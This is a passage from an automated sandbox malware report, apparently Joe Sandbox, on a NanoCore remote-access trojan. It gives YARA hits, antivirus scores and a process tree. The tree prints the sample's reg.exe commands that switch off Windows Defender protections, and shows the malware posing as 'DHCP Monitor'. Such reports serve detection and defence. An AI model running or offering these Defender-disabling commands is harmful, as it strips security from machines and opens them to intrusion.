          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\Service.exe, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 100%, Joe Sandbox ML
          • Detection: 98%, ReversingLabs
          Reputation:low

          Analysis Process: cmd.exe PID: 6552 Parent PID: 6492

          General

          Start time:17:34:10
          Start date:12/05/2021
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Imagebase:0x7ff7180e0000
          File size:273920 bytes
          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: conhost.exe PID: 6580 Parent PID: 6552

          General

          Start time:17:34:10
          Start date:12/05/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff61de10000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: reg.exe PID: 6620 Parent PID: 6552

          General

          Start time:17:34:10
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe query 'HKU\S-1-5-19\Environment'
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: reg.exe PID: 6732 Parent PID: 6552

          General

          Start time:17:34:12
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: reg.exe PID: 6792 Parent PID: 6552

          General

          Start time:17:34:13
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: reg.exe PID: 6840 Parent PID: 6552

          General

          Start time:17:34:14
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: reg.exe PID: 6920 Parent PID: 6552

          General

          Start time:17:34:16
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: reg.exe PID: 6956 Parent PID: 6552

          General

          Start time:17:34:18
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: reg.exe PID: 6992 Parent PID: 6552

          General

          Start time:17:34:19
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: dhcpmon.exe PID: 7056 Parent PID: 3440

          General

          Start time:17:34:21
          Start date:12/05/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
          Imagebase:0xc60000
          File size:207360 bytes
          MD5 hash:A54512682E96BF7475C189E0D85C4B1F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 100%, Joe Sandbox ML
          • Detection: 80%, Virustotal, Browse
          • Detection: 98%, ReversingLabs
          Reputation:low

          Analysis Process: conhost.exe PID: 6976 Parent PID: 6956

          General

          Start time:17:34:48
          Start date:12/05/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff61de10000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high

          Disassembly

          Code Analysis

          Reset < >